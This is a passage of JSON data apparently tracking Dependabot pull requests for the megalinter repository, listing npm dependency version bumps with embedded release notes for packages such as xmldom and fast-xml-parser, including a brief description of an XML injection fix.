href=\"https://github.com/npm/node-semver/commit/2677f2a88334b0e728dbfe9ad9f5f57458437c87\"\u003e\u003ccode\u003e2677f2a\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/778\"\u003e#778\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.23.6 to 4.24.3 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/778\"\u003e#778\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/npm-cli-bot\"\u003e\u003ccode\u003e@​npm-cli-bot\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.0...v7.7.1\"\u003e7.7.1\u003c/a\u003e (2025-02-03)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/af761c05bd53eef83b5e20f8b09360b0e70557dc\"\u003e\u003ccode\u003eaf761c0\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/764\"\u003e#764\u003c/a\u003e inc: fully capture prerelease identifier (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/764\"\u003e#764\u003c/a\u003e) (\u003ca href=\"https://github.com/wraithgar\"\u003e\u003ccode\u003e@​wraithgar\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.6.3...v7.7.0\"\u003e7.7.0\u003c/a\u003e (2025-01-29)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/0864b3ce7932667013e0c7c5ec764777d4682883\"\u003e\u003ccode\u003e0864b3c\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/753\"\u003e#753\u003c/a\u003e add \u0026quot;release\u0026quot; inc type (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/753\"\u003e#753\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/d588e3782864b1cab2fe9f2452b848e8c7f609d1\"\u003e\u003ccode\u003ed588e37\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/755\"\u003e#755\u003c/a\u003e diff: fix prerelease to stable version diff logic (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/755\"\u003e#755\u003c/a\u003e) (\u003ca href=\"https://github.com/eminberkayd\"\u003e\u003ccode\u003e@​eminberkayd\u003c/code\u003e\u003c/a\u003e, berkay.daglar)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/8a34bdecc783407f4e1a8a1ee1f67906b84a4b78\"\u003e\u003ccode\u003e8a34bde\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/754\"\u003e#754\u003c/a\u003e add identifier validation to \u003ccode\u003einc()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/754\"\u003e#754\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/67e54785a0f871361230f84323cbb631b9b6d834\"\u003e\u003ccode\u003e67e5478\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github....\n\n_Description has been truncated_","html_url":"https://github.com/oxsecurity/megalinter/pull/7612","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/oxsecurity%2Fmegalinter/issues/7612","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/7612/packages"}},{"old_version":"2.17.0","new_version":"11.4.4-cjs.2","update_type":"major","path":null,"pr_created_at":"2026-04-14T14:07:19.000Z","version_change":"2.17.0 → 11.4.4-cjs.2","issue":{"uuid":"4262602711","node_id":"PR_kwDOJkwVw87SVOwM","number":17,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 39 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-15T23:34:35.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-14T14:07:19.000Z","updated_at":"2026-04-15T23:34:37.000Z","time_to_close":120436,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":39,"packages":[{"name":"@xmldom/xmldom","old_version":"0.8.7","new_version":"0.8.12","repository_url":"https://github.com/xmldom/xmldom"},{"name":"fast-xml-parser","old_version":"4.2.2","new_version":"4.5.6","repository_url":"https://github.com/NaturalIntelligence/fast-xml-parser"},{"name":"glob","old_version":"10.2.3","new_version":"10.5.0","repository_url":"https://github.com/isaacs/node-glob"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"jsonpath","old_version":"1.1.1","new_version":"1.3.0","repository_url":"https://github.com/dchester/jsonpath"},{"name":"path-to-regexp","old_version":"6.2.1","new_version":"6.3.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"path-to-regexp","old_version":"1.8.0","new_version":"1.9.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"express","old_version":"4.18.2","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"form-data","old_version":"4.0.0","new_version":"4.0.4","repository_url":"https://github.com/form-data/form-data"},{"name":"@babel/runtime-corejs3","old_version":"7.13.9","new_version":"7.29.2","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.17.0","new_version":"11.4.4-cjs.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"brace-expansion","old_version":"1.1.8","new_version":"1.1.14","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"ws","old_version":"6.2.2","new_version":"6.2.3","repository_url":"https://github.com/websockets/ws"},{"name":"flatted","old_version":"3.2.2","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"socket.io-parser","old_version":"3.3.3","new_version":"3.3.5","repository_url":"https://github.com/socketio/socket.io"},{"name":"get-func-name","old_version":"2.0.0","new_version":"2.0.2","repository_url":"https://github.com/chaijs/get-func-name"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"jws","old_version":"3.2.2","new_version":"3.2.3","repository_url":"https://github.com/brianloveswords/node-jws"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"sharp","old_version":"0.30.7","new_version":"0.32.6","repository_url":"https://github.com/lovell/sharp"},{"name":"svgo","old_version":"2.8.0","new_version":"2.8.2","repository_url":"https://github.com/svg/svgo"},{"name":"tar-fs","old_version":"2.1.1","new_version":"2.1.4","repository_url":"https://github.com/mafintosh/tar-fs"},{"name":"word-wrap","old_version":"1.2.3","new_version":"1.2.5","repository_url":"https://github.com/jonschlinkert/word-wrap"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@xmldom/xmldom](https://github.com/xmldom/xmldom) | `0.8.7` | `0.8.12` |\n| [fast-xml-parser](https://github.com/NaturalIntelligence/fast-xml-parser) | `4.2.2` | `4.5.6` |\n| [glob](https://github.com/isaacs/node-glob) | `10.2.3` | `10.5.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [jsonpath](https://github.com/dchester/jsonpath) | `1.1.1` | `1.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `6.2.1` | `6.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `1.8.0` | `1.9.0` |\n| [express](https://github.com/expressjs/express) | `4.18.2` | `4.22.1` |\n| [form-data](https://github.com/form-data/form-data) | `4.0.0` | `4.0.4` |\n| [@babel/runtime-corejs3](https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3) | `7.13.9` | `7.29.2` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.17.0` | `11.4.4-cjs.2` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.8` | `1.1.14` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [ws](https://github.com/websockets/ws) | `6.2.2` | `6.2.3` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.2` | `3.4.2` |\n| [socket.io-parser](https://github.com/socketio/socket.io) | `3.3.3` | `3.3.5` |\n| [get-func-name](https://github.com/chaijs/get-func-name) | `2.0.0` | `2.0.2` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [jws](https://github.com/brianloveswords/node-jws) | `3.2.2` | `3.2.3` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [sharp](https://github.com/lovell/sharp) | `0.30.7` | `0.32.6` |\n| [svgo](https://github.com/svg/svgo) | `2.8.0` | `2.8.2` |\n| [tar-fs](https://github.com/mafintosh/tar-fs) | `2.1.1` | `2.1.4` |\n| [word-wrap](https://github.com/jonschlinkert/word-wrap) | `1.2.3` | `1.2.5` |\n\nBumps the npm_and_yarn group with 1 update in the /.github/actions/close-bot directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\n\nUpdates `@xmldom/xmldom` from 0.8.7 to 0.8.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/releases\"\u003e\u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.8.12\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/discussions/357\"\u003ehttps://github.com/xmldom/xmldom/discussions/357\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.8.11\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.10...0.8.11\"\u003e0.8.11\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate \u003ccode\u003eownerDocument\u003c/code\u003e when moving nodes between documents \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/933\"\u003e\u003ccode\u003e[#933](https://github.com/xmldom/xmldom/issues/933)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/932\"\u003e\u003ccode\u003e[#932](https://github.com/xmldom/xmldom/issues/932)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/shunkica\"\u003e\u003ccode\u003e@​shunkica\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.10\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.9...0.8.10\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edom: prevent iteration over deleted items \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/514\"\u003e\u003ccode\u003e[#514](https://github.com/xmldom/xmldom/issues/514)\u003c/code\u003e\u003c/a\u003e/ \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/499\"\u003e\u003ccode\u003e[#499](https://github.com/xmldom/xmldom/issues/499)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/qtow\"\u003e\u003ccode\u003e@​qtow\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.9\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.8...0.8.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSet nodeName property in ProcessingInstruction \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/509\"\u003e\u003ccode\u003e[#509](https://github.com/xmldom/xmldom/issues/509)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/505\"\u003e\u003ccode\u003e[#505](https://github.com/xmldom/xmldom/issues/505)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/cjbarth\"\u003e\u003ccode\u003e@​cjbarth\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.8\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.7...0.8.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/blob/master/CHANGELOG.md\"\u003e\u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003e0.8.12\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.10...0.8.11\"\u003e0.8.11\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate \u003ccode\u003eownerDocument\u003c/code\u003e when moving nodes between documents \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/933\"\u003e\u003ccode\u003e[#933](https://github.com/xmldom/xmldom/issues/933)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/932\"\u003e\u003ccode\u003e[#932](https://github.com/xmldom/xmldom/issues/932)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/shunkica\"\u003e\u003ccode\u003e@​shunkica\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.8...0.9.7\"\u003e0.9.8\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: replace \\u2029 as part of normalizeLineEndings \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/839\"\u003e\u003ccode\u003e[#839](https://github.com/xmldom/xmldom/issues/839)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/838\"\u003e\u003ccode\u003e[#838](https://github.com/xmldom/xmldom/issues/838)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eperf: speed up line detection \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/847\"\u003e\u003ccode\u003e[#847](https://github.com/xmldom/xmldom/issues/847)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/838\"\u003e\u003ccode\u003e[#838](https://github.com/xmldom/xmldom/issues/838)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChore\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdated dependencies\u003c/li\u003e\n\u003cli\u003edrop jazzer and rxjs devDependencies \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/845\"\u003e\u003ccode\u003e[#845](https://github.com/xmldom/xmldom/issues/845)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/kboshold\"\u003e\u003ccode\u003e@​kboshold\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/Ponynjaa\"\u003e\u003ccode\u003e@​Ponynjaa\u003c/code\u003e\u003c/a\u003e,\nfor your contributions.\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.6...0.9.7\"\u003e0.9.7\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImplementation of \u003ccode\u003ehasAttributes\u003c/code\u003e \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/804\"\u003e\u003ccode\u003e[#804](https://github.com/xmldom/xmldom/issues/804)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003elocator is now true even when other options are being used for the DOMParser \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/802\"\u003e\u003ccode\u003e[#802](https://github.com/xmldom/xmldom/issues/802)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/803\"\u003e\u003ccode\u003e[#803](https://github.com/xmldom/xmldom/issues/803)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/189cb78a83e81e1515880988a399e863a8be85ac\"\u003e\u003ccode\u003e189cb78\u003c/code\u003e\u003c/a\u003e 0.8.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ed08df7572f4236d4fd88d16063c3fd8f59c7884\"\u003e\u003ccode\u003eed08df7\u003c/code\u003e\u003c/a\u003e fix: XML injection via unsafe CDATA serialization (GHSA-wh4c-j3r5-mjhp) (\u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/968\"\u003e#968\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/a5b929ba008f067eeabb427c38de008e36a92796\"\u003e\u003ccode\u003ea5b929b\u003c/code\u003e\u003c/a\u003e chore: clean up generated test artefacts before running ci-local\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/4e37a205627a08eb64365b13c4e4cce5e86278cb\"\u003e\u003ccode\u003e4e37a20\u003c/code\u003e\u003c/a\u003e ci: run format:check in lint job\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ac0ac7714f0e5a7bd7aff5c30f7733666cf03982\"\u003e\u003ccode\u003eac0ac77\u003c/code\u003e\u003c/a\u003e chore: ignore generated files when checking formatting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/968c8939438eec2eca1d003b333cd0fc4595c72d\"\u003e\u003ccode\u003e968c893\u003c/code\u003e\u003c/a\u003e chore: add local CI script and format:check script\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ac40424adfa49429811095bcdaf6598255a81a39\"\u003e\u003ccode\u003eac40424\u003c/code\u003e\u003c/a\u003e fix: preserve trailing whitespace in ProcessingInstruction data (\u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/962\"\u003e#962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cece7521a3c77da7a10f3fc66521e3e077c9974c\"\u003e\u003ccode\u003ecece752\u003c/code\u003e\u003c/a\u003e chore: add .nvmrc pointing to node version 18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cbf44d90a40703237d217598fa0bcd88770bfa0b\"\u003e\u003ccode\u003ecbf44d9\u003c/code\u003e\u003c/a\u003e docs: improve links to changes in most recent release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/c0f14011c7cf93af60b2541898065b7136594f6b\"\u003e\u003ccode\u003ec0f1401\u003c/code\u003e\u003c/a\u003e 0.8.11\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.7...0.8.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~karfau\"\u003ekarfau\u003c/a\u003e, a new releaser for \u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-xml-parser` from 4.2.2 to 4.5.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/releases\"\u003efast-xml-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eSummary update on all the previous releases from v4.2.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMultiple minor fixes provided in the validator and parser\u003c/li\u003e\n\u003cli\u003ev6 is added for experimental use.\u003c/li\u003e\n\u003cli\u003eignoreAttributes support function, and array of string or regex\u003c/li\u003e\n\u003cli\u003eAdd support for parsing HTML numeric entities\u003c/li\u003e\n\u003cli\u003ev5 of the application is ESM module now. However, JS is also supported\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eNote\u003c/strong\u003e: Release section in not updated frequently. Please check \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md\"\u003eCHANGELOG\u003c/a\u003e or \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/tags\"\u003eTags\u003c/a\u003e for latest release 